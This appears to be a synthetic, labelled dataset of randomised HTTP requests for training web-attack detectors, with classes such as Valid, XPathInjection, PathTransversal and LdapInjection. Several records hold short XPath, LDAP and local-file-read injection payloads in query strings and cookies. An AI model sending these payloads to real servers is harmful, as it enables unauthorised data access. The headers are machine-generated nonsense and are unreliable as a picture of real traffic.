If-None-Match: "iMxl3FPnzJ1axfE."
If-Range: *
Max-Forwards: 55
MIME-Version: 6.1
Pragma: im='borysggh'
Proxy-Authorization: NTLM YXNucmlkZW5uaXJuaGNzcGVuZHM5c29zZW1ycmVlZXVpb2RJck5hdHU1cjJpRQ==
Authorization: ta3nN8 eoeehzo=eeatdu
Range: 1016-,1-936,-4477
Referer: http://www.n6l5k1xf.be/3qdttBr/teiw.sh
TE: deflate;q=0.7,trailers,gzip;q=0.7
Trailer: Referer
User-Agent: 2L75LTzA http://www.dhatea.de
UA-CPU: MIPS
UA-Disp: 7850,134,16
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 134x6878
Via: 2.7 185.196.233.134:2102, FTP/8.3 www.d5sppq.png:0615, 3.5 www.otariCet.shtml:31284
Transfer-Encoding: deflate
Upgrade: hrnaea/8.0, Re4t/7.6, 7c4/1.7, 3hq/6.9
Warning: 047 www.ties.htm "wnstmfmcneTi" 
X-Forwarded-For: 207.142.89.78
X-Serial-Number: 8712140
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 22840
Start - Id: 6990
class: Valid
POST /njbrtaoisl7ldSeega/passthru3G1.RhBe/cnL1lEEtdHdred1trara/e2uzaed/diwox/RwNnCt6nds/pY94hPVTYhxwsk.jpg? HTTP/1.0
Content-Length: 82
Content-Language: ae,xna4
Content-Encoding: compress
Content-Location: /anePaat8.tar
Content-MD5: b3QyM2xyZXN3bGFleHJ0Tg==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 15 Oct 09 17:38:15 GMT
Last-Modified: Sun, 03 Aug 08 12:43:58 UTC
Host: 139.77.241.220
Connection: keep-alive
Accept: */*;q=0.5
Accept-Charset: *;q=0.7
Accept-Encoding: *
Accept-Language: e-a, at-eyi3htc, eh1-5js;q=0.8, teenisyv-w;q=0.6, x-0nerXx;q=0.8
Cache-Control: max-age=37
Client-ip: 202.128.51.133
Cookie: reaaiktygraiira=32;eesesecE6kesmp=4587275;2a=dk ybhomebescriptYpassthruz&t;vsh6BdC=7r~vh;hfeeyeiEza=eyShe
Cookie2: $Version="414"
Date: Mon, 07 Mar 05 01:04:41 GMT
ETag: W/"4HW5m1z0YPa-.Mv-dE"
Expect: 100-continue
From: souwa@lpEs.net
If-Modified-Since: Wed, 16 Aug 06 09:46:00 GMT
If-Unmodified-Since: Mon, 20 Feb 06 08:42:33 GMT
If-Match: *
If-None-Match: *
If-Range: "F@2UPZpGNYvb0UqoSkRb"
Max-Forwards: 4150
MIME-Version: 3.4
Pragma: jzs='cxoi'
Proxy-Authorization: aasa0 Tiemls=e9ea
Authorization: tdssoa deaoe=28lsl7g
Range: 544-,459-
Referer: /2op5e2.cfm
TE: trailers,deflate
Trailer: Host
User-Agent: Mozilla/9.0 (Windows; U; Win98 3.4; on-hn; rv:3.4.9) Gecko/30388083
UA-CPU: 68000
UA-Disp: 4258,294,32
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 821x4420
Via: 2.3 www.eokli.html, tpgl/4.2 146.164.160.42, 3.3 208.19.81.159
Transfer-Encoding: compress
Upgrade: n2e/1.3
Warning: 506 www.isxea3en.htm "fCnsiousntr6A9nt" "Thu, 15 Mar 07 14:14:02 CET"
X-Forwarded-For: 67.65.254.52
X-Serial-Number: 95729667
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

VmochaViB_I@_7include=36913510&rhiaitmen7m=CoA1pserrR&rorahf=i%ofelgshutdownlkTt

End - Id: 6990
Start - Id: 49776
class: XPathInjection
GET /qay3baWyou8rljee/4WIIGyM/ibS@-4.pjyoDz/midEUtehad/o8eynne6ielte/ijo/oerrTaiw.dll?0hsnetcatSBL=137369&qasslmtllvf=a4Xf8rqytryv&eeasah=oH788&tRn=sid6et6s%27+++++or++++6+++%3C+++++count%28path%2Fchild%3A%3A*%29+++or++%278ahQ%27+++%3D++%27&1z=edieo&she7Si3dT=dqeTai%25ins&seitttp=a%27ma&wguieepn53ne=uehtoj%3Bym+z%3C&rNreo0aiw=4&7pu=d+&oxthrenfozdSam=nph-vai&co=46486651&ialtw=8&t5d0tsn31ppo=29648&j_yOqVrbodylhtpassQ=trot0in+cmdegndc HTTP/1.1
Host: www.6nlateenla.st:80
Connection: keep-alive
Accept: audio/*
Accept-Charset: utf-7;q=0.9, iso-8859-9;q=0.1, iso-2022-kr, windows-1254
Accept-Encoding: *
Accept-Language: ueYsy-waenh;q=0.8, o-e;q=0.2, luda-anrEauae, l6-aenisa
Cache-Control: no-cache
Client-ip: 253.1.218.202
Cookie: oeoieonrmpEi=oiCdhleusrmfiphpboot.inien;3dz-435KV=r9aBntOjeirh;betA3=bodytuN;eOpucgdtaemit=dk~;Teegoieb=5142534
Cookie2: $Version="4"
Date: Sun, 10 Apr 05 18:02:41 UTC
ETag: "1nP4Bu6v9ApZYEoCkX5p"
Expect: iedo=iysauhb
From: oeeybh7n@salnzlo.de
If-Modified-Since: Sun, 14 Jan 07 14:05:13 CET
If-Unmodified-Since: Sat, 10 Sep 05 09:40:17 GMT
If-Match: *
If-None-Match: *
If-Range: Wed, 04 Apr 07 22:13:39 CET
Max-Forwards: 8532
MIME-Version: 6.9
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: oehb ranln=fcmedrne
Range: -43159,7-
Referer: /Maeyiq/oc2eef/mmoa3yw/5rdlosa.php3
TE: trailers
Trailer: Connection
User-Agent: Mozilla/0.2 (X11; U; Open BSD i386 7.4; xy-5e; rv:4.1.6) Gecko/43783412
UA-CPU: Sparc
UA-Disp: 7451,3171,32
UA-OS: Win95
UA-Color: color16
UA-Pixels: 3095x7377
Via: FTP/0.3 www.teygjyw.js
Transfer-Encoding: gzip
Upgrade: isn/7.4, skmojq/8.7, srajau/4.8, osil/1.0
Warning: 313 www.rnatjdd.tiff "ikOaheaoton2wee" "Wed, 13 May 09 04:48:39 UTC"
X-Forwarded-For: 242.32.16.78
X-Serial-Number: 9273829516846529
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 49776
Start - Id: 44783
class: PathTransversal
GET /eX@@4h.kAkFrdgp/ejosouittri6aoyS/s.7zxxzV3pst21P/aH-yxKCehxFHSAC/dW3h1WVabk/u9/fGLF6Gqzw1UVnsUz/jX6MYdzkTs/uysmNa/djyqxvtqVelVzHJ@/oF9rhLYJPdm_kCn.tiff?naeaatoaedxooto=fa3ces0qhmea4&6CEyWt6XX=collection%28++++file%3A%2F%2F%2Fc%3A%2Fgtdt%2Fsipnoi.xml+++%29 HTTP/1.0
Host: www.rlTh7su.fr
Connection: keep-alive
Accept: */*;q=0.7
Accept-Charset: iso-8859-15, windows-1253, x-mac-arabic;q=0.1, windows-1255
Accept-Encoding: *;q=0.3
Accept-Language: ii-h6e;q=0.8, ngno-1mrinmo;q=0.0, htams-o;q=0.3, ac-ek, 9cuet-Ea
Cache-Control: max-age=2
Client-ip: 108.193.198.116
Cookie: 7yO-0dG90a09d=055;eei=1eoeT;atity3l7ofi=simopenEaqf;tosNfEmtiwe=8;emebaeNt=tZtZLUu-LeRY
Cookie2: $Version="51"
Date: Thu, 12 May 05 10:55:44 UTC
ETag: "iFE2lKQFDoEmCoaqzw"
Expect: 100-continue
From: Cmaxdcp@rimabEod.be
If-Modified-Since: Tue, 11 Jul 06 01:30:53 UTC
If-Unmodified-Since: Wed, 23 Jun 04 13:11:17 CET
If-Match: *
If-None-Match: *
If-Range: "kkjXyaYb9_QMuAyd@wAE"
Max-Forwards: 1961
MIME-Version: 2.7
Pragma: no-cache
Proxy-Authorization: Digest realm
Authorization: Basic bnRydEJlQTpxbWRR
Range: 8-
Referer: http://nsndoju.biz/eaat/mton/yb4ihn.sh
TE: deflate;q=0.1,trailers,deflate;q=0.7
Trailer: Expect
User-Agent: aaz9toIA (sQv-SHG; yH.q79-qP)
UA-CPU: MIPS
UA-Disp: 3445,5667,32
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 822x152
Via: 1.2 160.216.253.69
Transfer-Encoding: identity
Upgrade: xdn/6.9, zath/4.3, enftae/3.8, tsot/2.4
Warning: 651 www.ohli.jpeg "ze4iSksESreE" 
X-Forwarded-For: 87.170.85.167
X-Serial-Number: 2157159271334
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44783
Start - Id: 38229
class: LdapInjection
GET /vjWY/srHlAM/r7graKN3/St2ofht6ofubab/uagecrtare.js?leacizef=6893735&tsaoudS0ee8hs=%29%28%7C+++%28cn%3D*o%27brien*+%29%28mail+%3D*o++%27brien*%29++++&io7h5Chex1h=3&aae=lrkNant1so HTTP/1.1
Host: 46.134.1.205
Connection: iddtenoX
Accept: application/postscript;q=0.5, audio/x-wav
Accept-Charset: *
Accept-Encoding: 
Accept-Language: hhdza1ld-rrhpu6Eq;q=0.9, os-4;q=0.9, oho-iqe
Cache-Control: only-if-cached
Client-ip: 63.201.6.101
Cookie: HF8b6http1=6389;dJuntnt=75pgekoesY9tObtvno;eenyoe3fvcc=eoin;rss=sddtypataNnoubi4;sedeed=ue;EdI57ornAnia=0975
Cookie2: $Version="541"
Date: Thu, 05 Feb 09 17:45:00 CET
ETag: W/"BY2g_qEtIFk46DMqc"
Expect: 100-continue
From: Oni9Cjt@Idhlgm9aom.net
If-Modified-Since: Fri, 09 Jun 06 06:23:03 CET
If-Unmodified-Since: Sun, 03 Aug 08 01:25:14 CET
If-Match: "HIlWKS-mxv5p9s5KPfV"
If-None-Match: "MiPRWgygrTK_OII6"
If-Range: Sat, 10 Oct 09 06:00:15 GMT
Max-Forwards: 4
MIME-Version: 6.4
Pragma: yxaB6oui='iOp'
Proxy-Authorization: olshew aitLt=niTeot
Authorization: NTLM YnRvc2ZodmFhZXFodHNpcmRyb2NhaWVhS2VpcjdubHJlMA==
Range: 491-,605-2708,157323-67914
Referer: /AfeeEf/tsdnif/sotnssCW.doc
TE: gzip;q=0.1,gzip;q=0.2,gzip
Trailer: Accept-Charset
User-Agent: ooiveiuieeOpba
UA-CPU: StrongARM
UA-Disp: 5667,2371,16
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 4467x673
Via: FTP/9.6 153.243.239.113, HTTP/2.0 27.189.123.231, 9.2 232.132.70.100
Transfer-Encoding: kOctU; tnllhi=a1the
Upgrade: sdlwO/6.2, 4Awth/6.5, lsy/1.6, jri/4.6
Warning: 935 180.240.199.184:8 "Ehcivfp" 
X-Forwarded-For: 188.85.68.116
X-Serial-Number: 3952858356016801
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38229
Start - Id: 10023
class: Valid
GET /Ebhl/ai/hitonh0tl6fvnrir4a/t7ev4Nt/xAJGZduqO5lMV/tS.htm?qRdlrHetzssad=ao6skesqs&70kJeKKls=13&8G_B=9&dar10cite8aeef7=ycze&apNr0iw=lOg4HI8Hgcd9&o1ptlsinhb=669292 HTTP/1.0
Host: www.santt.biz
Connection: keep-alive
Accept: */*;q=0.7
Accept-Charset: *;q=0.9
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-cache
Client-ip: 29.47.242.107
Cookie: cXeDtehongS=TEwshn2rxo erm;tass3hankwT=638;aokiCrnmeshishz=17r)re;ibhzrnna=lsSC9wyvUu-;eTeadcqee=100412;4Thrcrdt=03
Cookie2: $Version="942"
Date: Fri, 25 Feb 05 10:53:09 UTC
ETag: "37Du@YuAnBeW63f@"
Expect: egereuh
From: ma7sea1@tueds.com
If-Modified-Since: Wed, 13 Jun 07 19:44:46 UTC
If-Unmodified-Since: Sun, 03 Sep 06 20:13:47 UTC
If-Match: "bJvohY-CQgno3sirzM"
If-None-Match: "MnOV8FmO.zAsM@Qe"
If-Range: Thu, 22 May 08 11:04:25 GMT
Max-Forwards: 0
MIME-Version: 1.2
Pragma: no-cache
Proxy-Authorization: npwt Loartcsg=sdhi
Authorization: NTLM NnMwdXRlcGFmamJkRmRnZWhydWhwdW9kVWRjc2ZzZ2Rrb3R0ZQ==
Range: 7-,1-2,575-73
Referer: http://rien.de/Seahl/ezn9id/4mon/haastyq.php3
TE: deflate,trailers,trailers
Trailer: From
User-Agent: Mozilla/1.9 (Windows; U; Win98 4.6; n6-se; rv:7.4.7) Gecko/34967744
UA-CPU: 68000
UA-Disp: 528,194,16
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 470x7016
Via: FTP/2.9 www.tznohs.jpeg:03270
Transfer-Encoding: compress
Upgrade: asoetw/7.0
Warning: 441 www.sNfaestc.html:841 "a3fh" 
X-Forwarded-For: 156.117.248.41
X-Serial-Number: 21316010619533
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 10023
Start - Id: 29490
class: Valid
GET /5W/eaLsYex6eN3sea/nautoexec/n29SPr/ecp/codlOT8njB3t.bin?eewzheuyn3a=yr5t&eaoaiea6ni10D=4R&NirilrUs=83&rrajpkntiheoU=t&diarkp07a9gttb=301&Iaedtn0Feae=+awindow.openo&tvihaw=69523&VRjFRnph-iXUKNr=a8tfwIRK&8nsEtraaiyie4rk=tPPN&Eiipoza0i4eot=Nsbg&pt4between=o6eioirhvihtW HTTP/1.0
Host: 243.75.114.76
Connection: sNkrk
Accept: image/*;q=0.4, application/*;q=0.6, text/*;q=0.3
Accept-Charset: *
Accept-Encoding: deflate;q=0.8
Accept-Language: Ed-ln;q=0.2, famtmbys-ir0et;q=0.8, s3tse1b-cifentn;q=0.8, 2h0r-tjnftqT;q=0.7, MCtkoe-eet
Cache-Control: no-cache
Client-ip: 12.169.110.212
Cookie: qan4e=9ai'n;Ss4birEeentdQb=hw90rMK9SPK5;skneieOgtm=ol
Cookie2: $Version="626"
Date: Thu, 15 Dec 05 24:30:08 CET
ETag: W/"wUZdMJW-5GbCkeQQdz_"
Expect: uneeteg
From: hnoyso@ioJaegaa.st
If-Modified-Since: Sat, 27 Feb 10 11:12:30 CET
If-Unmodified-Since: Fri, 29 Jul 05 12:15:03 GMT
If-Match: "boE8VfV65i-q3Qd6uOJ"
If-None-Match: "MbmAiwYg2ali60hBmVFR"
If-Range: "CJrESb49w735mExT"
Max-Forwards: 4903
MIME-Version: 3.9
Pragma: rlRzzfua=Mro
Proxy-Authorization: Basic N2x1MjpjdzdyZXM=
Authorization: e2sl hebggrp=shcoOps
Range: 6551-
Referer: http://nownrp.cz/ws7sn.php3
TE: chunked,gzip;q=0.7,trailers
Trailer: Host
User-Agent: adefh/5.3
UA-CPU: Sparc
UA-Disp: 3759,7587,8
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 522x597
Via: FTP/9.5 www.7I3ii.shtml, HTTP/6.5 243.217.175.222, 7.1 www.jteg1tSy.shtml
Transfer-Encoding: compress
Upgrade: nene/2.6
Warning: 270 101.148.72.64:95 "i8edoTSEtsz" "Wed, 28 Dec 05 21:22:16 CET"
X-Forwarded-For: 160.172.24.250
X-Serial-Number: 801273405
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 29490
Start - Id: 38393
class: LdapInjection
GET /EFt/6afUM5j/xAbw/ps/uKR-n.m33hYyg/ilw/eyhEUE/ff@9/weotdd5CN1hnwEt3Ud0a/m8_hdeWnDH13X/hjpsabdi/ew9ESMy.nMWpuEDs7E4g.tiff?jcbo=union+Uf1Neeh+updates&stts=92321&i5lnnitAs=%22%29%28targetfilter%3D%28o%3DNetscapeRoot%29%29&esnrewf=w5afr+t%25&lynl=d&ps6itemxottEN=++%5B&oVRxmlfvsock_stream2iDIQ=72423&hlOene9ororsl8h=17&ranehaeortm=pl6bmi%285++e5systemf&roefOoiofu0=587354&V5WE@ClgNX=n HTTP/1.0
Host: 151.245.206.121:80
Connection: dndl6tp
Accept: application/postscript, video/quicktime, application/rtf;q=0.6
Accept-Charset: *;q=0.0
Accept-Encoding: 
Accept-Language: *;q=0.3
Cache-Control: no-cache
Client-ip: 198.17.15.97
Cookie: ouioaZuts1l=97
Cookie2: $Version="08"
Date: Fri, 24 Mar 06 13:50:15 UTC
ETag: "fYwZspfNp8.oWly-Njh"
Expect: eeeti
From: e3ig@cUsnasr.com
If-Modified-Since: Wed, 16 Mar 05 04:41:51 CET
If-Unmodified-Since: Thu, 15 May 08 16:27:29 UTC
If-Match: "q0ZFq7q@ZSa2QEn7AtP"
If-None-Match: *
If-Range: "@kLqjiKycSjv_jy"
Max-Forwards: 3861
MIME-Version: 5.2
Pragma: tc90ZoiY=aiUncnum
Proxy-Authorization: Digest opaque="teJjbis"
Authorization: Basic R25hZU5wOmx0eXM5dA==
Range: -96373
Referer: /Itzbf.php4
TE: chunked;q=0.2,trailers,chunked;q=0.4
Trailer: Trailer
User-Agent: aEtqlmea http://www.fwcq.gov
UA-CPU: Sparc
UA-Disp: 6597,6108,32
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 6780x4829
Via: FTP/1.6 160.150.147.193, 0.3 40.189.67.2
Transfer-Encoding: gzip
Upgrade: rlwdd/8.0, wre/1.9, b3o/6.7
Warning: 267 www.otmR1ir.htm "emnzR" "Mon, 09 Jun 08 08:56:30 UTC"
X-Forwarded-For: 139.160.46.245
X-Serial-Number: 85165873223938
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38393
Start - Id: 11180
class: Valid
GET /B2Q.vart/amuIlnmwxsoesz/sGf@fa7D/nidBebxzfVM7_6c/qlqt8vCg2935Dl/r6j/aG5A6.XYC2di/ApLV6aQzSxmlhvpY/nsmE1aisaebDofeea.tiff?gRu.nullwgf.boot.iniA=931612334&mlaSIg=115 HTTP/1.1
Host: 238.158.165.73
Connection: 1pm5rr
Accept: image/*;q=0.3, application/rtf, image/png
Accept-Charset: *;q=0.3
Accept-Encoding: deflate;q=0.3, deflate;q=0.1, identity;q=0.2, deflate, compress;q=0.6
Accept-Language: hee4-nB7ekw;q=0.9, cp-Pho;q=0.0, ueataf-seagimum, coseaa-i, jute-9sWnptds;q=0.6
Cache-Control: no-cache
Client-ip: 31.125.40.176
Cookie: uyloJGheoe=tOdneenttt;ZJuallG7=el2Ri 9'la?iohn
Cookie2: $Version="235"
Date: Wed, 05 Aug 09 03:19:18 CET
ETag: "JqqkIqCF4xV4FZRK"
Expect: 100-continue
From: exRkrsa@Adzgatioo.net
If-Modified-Since: Sat, 21 Apr 07 24:45:14 UTC
If-Unmodified-Since: Sat, 08 Apr 06 09:27:28 CET
If-Match: *
If-None-Match: *
If-Range: Mon, 16 May 05 10:25:12 CET
Max-Forwards: 19
MIME-Version: 2.4
Pragma: no-cache
Proxy-Authorization: Basic Ym9pZWhhOjRueWU1enN0
Authorization: anoe4h Sone=lcsavTrj
Range: -6966,-2,79731-5613
Referer: http://btAhl.ch/Dhea0t/in5eed.ace
TE: trailers,trailers
Trailer: Warning
User-Agent: Mozilla/7.7 (Machintosh; U; PPC 2.7; os-ri; rv:3.9.0) Gecko/53361825
UA-CPU: StrongARM
UA-Disp: 473,1490,32
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 0885x0139
Via: 6.7 161.82.46.229, 6.0 2.5.189.2, 4.0 www.dtrlha5a.tiff:05163
Transfer-Encoding: deflate
Upgrade: aSraw/8.9, oumeo/3.1, 3alN/4.2, Kirn/2.1, txon/6.0
Warning: 587 29.152.16.59 "sKvi" "Sat, 16 Jul 05 05:54:58 CET"
X-Forwarded-For: 199.166.24.178
X-Serial-Number: 400472964333803
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 11180
Start - Id: 1305
class: Valid
GET /rfreueymiaogi.html?tEcitlslanR=masma6b&oDanjk5ueaatE=twhndlplt&em=314403377&cyanexefaOqaSyo=371488629&owsttosnaFotanz=++ne&pethtcnocb4Hl=ieei+%2B&390BO8sZ2AX=1840&Otpe6aurx7ta=96939&ne=1910753&elue=xmlt&rqgc=%3Etlbineti%5Bil8&ez=tercph&te2nt=4996&1w2MOOrr=rIPhjSpljf6 HTTP/1.1
Host: 238.251.98.133:80
Connection: close
Accept: */*;q=0.3
Accept-Charset: iso-8859-7;q=0.7, gb2312, hz-gb-2312, windows-1251;q=0.8
Accept-Encoding: 
Accept-Language: t7s-k2EeN, bnewbmea-niC, odalVYsi-cm2tLeo;q=0.9, iu7o-d
Cache-Control: no-cache
Client-ip: 213.178.76.185
Cookie: hecertiin=7;seenheh=i@li%1c;V4XW=necfisnsbmstn;glhnopeliEh=718;Ohfrbhneas=0Ehcwyuxpywot;Z5FeXX=41386
Cookie2: $Version="8"
Date: Mon, 13 Nov 06 06:19:47 UTC
ETag: W/"r3JRCi64yWn0jqV4kC"
Expect: 100-continue
From: strldbE@9qmhittm.gov
If-Modified-Since: Mon, 03 Mar 08 16:38:09 UTC
If-Unmodified-Since: Sat, 10 May 08 18:11:02 GMT
If-Match: "JOAb2qorcTbkd8L"
If-None-Match: *
If-Range: Sun, 13 Feb 05 22:12:09 CET
Max-Forwards: 2889
MIME-Version: 9.4
Pragma: eYehSIi=l
Proxy-Authorization: Basic dE8zb3I6aHNrdGt2Nm8=
Authorization: Digest uri=http://orecee.st/kNEtn/hrya/mTkk7en/tnoskihH.wmn
Range: -988,-63,-146
Referer: /kPekc3.png
TE: trailers,trailers
Trailer: Host
User-Agent: onopgulSa8qtPoL
UA-CPU: Sparc
UA-Disp: 298,657,32
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 7486x696
Via: 3.4 226.244.125.183:47, HTTP/8.7 146.80.38.254:523, 9.1 199.186.122.10
Transfer-Encoding: NnFeh
Upgrade: mutL/9.2, iiM/7.3, lustl/1.7
Warning: 222 www.adbe.jpg "ebprbkhtcfatduen" "Mon, 20 Mar 06 12:05:20 UTC"
X-Forwarded-For: 47.248.188.232
X-Serial-Number: 67843918306515180
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 1305
Start - Id: 969
class: Valid
GET /wHC@.htm?DxDcG=aYl8uitzNP&iiiayPb65ui=04&edrseic5pn=4580&tnaiwta=0328&stct=6&vinuv8tiren=t_r HTTP/1.0
Host: 78.10.197.73
Connection: a3ep9nr
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: hy2i-eie;q=0.3, T-htev, meoc-ffguca;q=0.4
Cache-Control: max-stale=8770
Client-ip: 155.237.153.253
Cookie: rqlveebddhsen=wrF-58qsD7@b;meJdHt=nn;etfp=465290;rawsmmtnlotShe=\n0usr yoct;tlutt=o0
Cookie2: $Version="446"
Date: Fri, 05 Oct 07 05:04:17 CET
ETag: "fq1Z02PL5UAwOQk.rNn"
Expect: lfsieb=esluey
From: drgltVi@44huhi.be
If-Modified-Since: Sun, 23 Sep 07 20:53:43 GMT
If-Unmodified-Since: Sat, 05 Nov 05 12:31:10 CET
If-Match: *
If-None-Match: *
If-Range: Sat, 22 Mar 08 01:06:28 CET
Max-Forwards: 5367
MIME-Version: 5.4
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: l1pjd BS3heh=vBentA
Range: 93711-32096
Referer: /nian/onez/edtgena/dV15hhys/tl1f.pl
TE: gzip,chunked
Trailer: Connection
User-Agent: meulted
UA-CPU: 68000
UA-Disp: 710,919,8
UA-OS: Win98
UA-Color: color32
UA-Pixels: 7955x0041
Via: 7.7 www.zaene.htm
Transfer-Encoding: identity
Upgrade: speh/3.3, Eai/0.1, hYun/9.4, uabeh/7.5, 8re3/1.6
Warning: 377 www.tccn1n.htm "TKmed" "Sun, 06 Sep 09 10:54:33 CET"
X-Forwarded-For: 18.21.214.141
X-Serial-Number: 045784
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 969
Start - Id: 1944
class: Valid
GET /t8etrjdeAzmeitrh3o/ObodyB6fR3J/lPv8Rd7/htaccesxtt-WztVqiG/nCKXNBhrH6Rhfshvn6/nn_.y5s@/tMWYlX672a470Wx5kS/eS-fmycIReYx0Uk/oassNaowtDtp/p3dEIgA0N.lV.swf?gaTeykclfelgTim=selneaOh8muiz&F5H7DipassthrufXV2D=n8&sMt=o&anlboi84tosr=b5zOssybn&9wa=-oh&tct6he=sddc HTTP/1.0
Host: 196.8.75.69:80
Connection: segQ1I
Accept: video/quicktime
Accept-Charset: *;q=0.0
Accept-Encoding: identity, compress;q=0.7, identity;q=0.6
Accept-Language: 8s14s-gbkkIeuy;q=0.7, o6th-nesbO;q=0.2
Cache-Control: no-transform
Client-ip: 152.106.51.28
Cookie: db=)SilnnG
Cookie2: $Version="71"
Date: Sun, 28 Jan 07 11:54:53 UTC
ETag: W/"SLmMXLc63s.SN-b7H1Rf"
Expect: r6od=urssnn7;cduho=rrd5a9es
From: pvxch@7harUebet.com
If-Modified-Since: Fri, 17 Sep 04 18:30:02 CET
If-Unmodified-Since: Sun, 01 Jul 07 15:36:48 CET
If-Match: *
If-None-Match: "vqjFOD2EybiD4AXYHA"
If-Range: Thu, 12 Feb 04 14:32:53 GMT
Max-Forwards: 81
MIME-Version: 7.4
Pragma: e=eoon
Proxy-Authorization: Basic d0NpYjlsZTo2b2dxbnRl
Authorization: 8erMn usNE=cpeNs1
Range: 0-,-750641
Referer: /DclxOsr/iairds/degoo.cfm
TE: trailers
Trailer: Date
User-Agent: Mozilla/5.5 (compatible; MSIE 7.6; WinNT; tlsswtdni)
UA-CPU: Sparc
UA-Disp: 0367,7065,8
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 1543x007
Via: 9.1 www.orwt2et.tiff, 7.1 177.113.221.126
Transfer-Encoding: identity
Upgrade: tsd/0.2, alvm/0.6, iEenc/5.7, nnoc/8.2, rtetzy/1.1
Warning: 663 www.Libe.html "iztelp" "Wed, 09 May 07 24:02:00 UTC"
X-Forwarded-For: 218.173.209.61
X-Serial-Number: 539815603365
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 1944
Start - Id: 37302
class: LdapInjection
PUT /48Ojnshutdown/esnrnw2e2/ll5feslteendadF/alpoii4ka2vmls/ek5AqwQTj/u7zMJt4yp3/yv3abg4dTHZ0.fcl9/eimsaxhr.css? HTTP/1.0
Content-Length: 42
Content-Language: v9me4
Content-Encoding: compress
Content-Location: http://setm.net/pydeoea/IoootrnC/ownctr/t1sghohc.php4
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 15 Sep 09 14:19:14 UTC
Last-Modified: Mon, 23 Jan 06 07:38:36 CET
Host: www.yistn.biz
Connection: 8ttemn
Accept-Charset: *;q=0.3
Accept-Encoding: *;q=0.2
Accept-Language: drtaJt-fe, utehbSj1-iaelAz, 2rhevT-e8, i-saakt;q=0.3, ah2nu-n4hseo
Cache-Control: no-cache
Client-ip: 218.131.77.230
Cookie: L_OVmu6o=487;etcw2QhBemAe=on)( |    (odme=*);Tea_htpassrg=759;i3O=ohaafIlitta3;Nah0hnoUEhvrw=ooo;spydt6naie2sve=281978
Date: Mon, 18 Aug 08 20:09:21 GMT
From: ea9sTse@dbeeM5an.org
If-None-Match: *
Max-Forwards: 339
MIME-Version: 8.8
Pragma: no-cache
Authorization: Digest algorithm=ltoheo
Referer: /nn0rr/raqmn/esscud/asUr/8esnCia.msf
TE: chunked,deflate
User-Agent: bmwio (9yYaab3)
Via: 4.1 www.oywesI.tiff:352

9frtpbesntj4=hfKiP&phuADaoiru31cDd=7866028

End - Id: 37302
Start - Id: 26692
class: Valid
GET /ttNrxwdircxtdtiTu/riaoasst/awDFK6yvNPdQbL8Ft/8glfraodns/H4SSQ5FWRtCVG/cie5esBri2tc0Uiot/In@p/nH6xq8iTzq0pJvn/tCNEwnLu_pQQD-_i09l/ab/dopsxnttyD.mdb?osrof9y6nayse1k=sock_streamtf&chIowxHmght=oJWf7QkB7&dc=ui&mhtjuavehwa=stm8Enalm&oeeeeah6ie=admint9thm5&ee4wctnaltnw=l&a2yked0f=3612874150 HTTP/1.1
Host: 192.99.148.83
Connection: t8ie5aoi
Accept: application/rtf;q=0.3, image/*;q=0.6
Accept-Charset: euc-cn
Accept-Encoding: *;q=0.2
Accept-Language: tre-omtEmos;q=0.9
Cache-Control: max-stale=564
Client-ip: 166.87.225.9
Cookie: crg6S_libFtHl=v9txtermhome tusdrradrop+ dstO;iaysN=il50h_fa-0
Cookie2: $Version="6"
Date: Sat, 26 Mar 05 11:12:57 UTC
ETag: "ozyrtrwA_AnPCK6mOBnZ"
Expect: 100-continue
From: aenrotes@hoereselr.be
If-Modified-Since: Mon, 12 Jan 04 20:53:53 GMT
If-Unmodified-Since: Thu, 23 Apr 09 14:01:41 UTC
If-Match: "4WjfymtdwB46xxH9x"
If-None-Match: *
If-Range: Thu, 09 Dec 04 13:33:27 CET
Max-Forwards: 7970
MIME-Version: 9.3
Pragma: no-cache
Proxy-Authorization: isve qte6twaT=auiot
Authorization: Basic dFNyY2FlOmZuckF0dzY=
Range: 25-
Referer: /SvyA/sebhy/hetEc1o3/isilnnGe/9rNictl5.asp
TE: trailers,deflate;q=0.4
Trailer: User-Agent
User-Agent: 7agtizdeba2jlIpsi
UA-CPU: PowerPC
UA-Disp: 1796,370,32
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 190x433
Via: HTTP/4.9 244.20.199.146:23927
Transfer-Encoding: compress
Upgrade: lWRqc/4.7, oaNoeA/8.1, SytTu/2.1, oaahe/2.1
Warning: 574 42.50.42.84 "esbdOnaSdh" 
X-Forwarded-For: 27.113.189.139
X-Serial-Number: 55910
